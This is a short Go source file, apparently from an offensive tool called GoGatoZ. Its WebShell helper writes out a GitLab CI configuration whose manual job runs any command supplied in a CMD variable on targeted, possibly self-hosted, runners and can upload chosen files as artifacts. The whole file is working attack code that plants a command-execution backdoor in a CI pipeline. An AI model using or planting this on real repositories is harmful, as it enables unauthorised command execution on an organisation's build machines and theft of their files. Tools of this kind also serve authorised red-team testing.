package attack

import (
	"fmt"
	"strings"

	"github.com/mr-pmillz/gogatoz/pkg/stringutil"
)

// WebShell provides helpers to generate CI configuration that executes arbitrary commands on targeted runners.
type WebShell struct{ *Attacker }

func NewWebShell(att *Attacker) *WebShell { return &WebShell{Attacker: att} }

// GenerateWebShellCI produces a .gitlab-ci.yml with a manual job that runs an arbitrary command via variable CMD.
// runnerTags may target self-hosted runner tags. If downloadPath is non-empty, the job uploads it as artifact.
func (w *WebShell) GenerateWebShellCI(jobName string, runnerTags []string, shell string, downloadPath string) string {
	if jobName == "" {
		jobName = "webshell"
	}
	var tagLine string
	if len(runnerTags) > 0 {
		tagLine = fmt.Sprintf("\n  tags: [%s]", stringutil.QuoteJoin(runnerTags))
	}
	var shellLine string
	if strings.TrimSpace(shell) != "" {
		shellLine = fmt.Sprintf("\n  before_script:\n    - echo Using shell %s", shell)
	}
	var artifacts string
	if strings.TrimSpace(downloadPath) != "" {
		artifacts = fmt.Sprintf("\n  artifacts:\n    when: always\n    paths:\n      - %s\n    expire_in: 1 day", downloadPath)
	}
	return fmt.Sprintf(`
# Auto-generated by GoGatoZ
stages: [shell]

%s:
  stage: shell%s%s
  variables:
    CMD: "id; uname -a"
  script:
    - echo "$CMD" > .cmd.sh
    - bash .cmd.sh || true%s
  rules:
    - when: manual
`, jobName, tagLine, shellLine, artifacts)
}
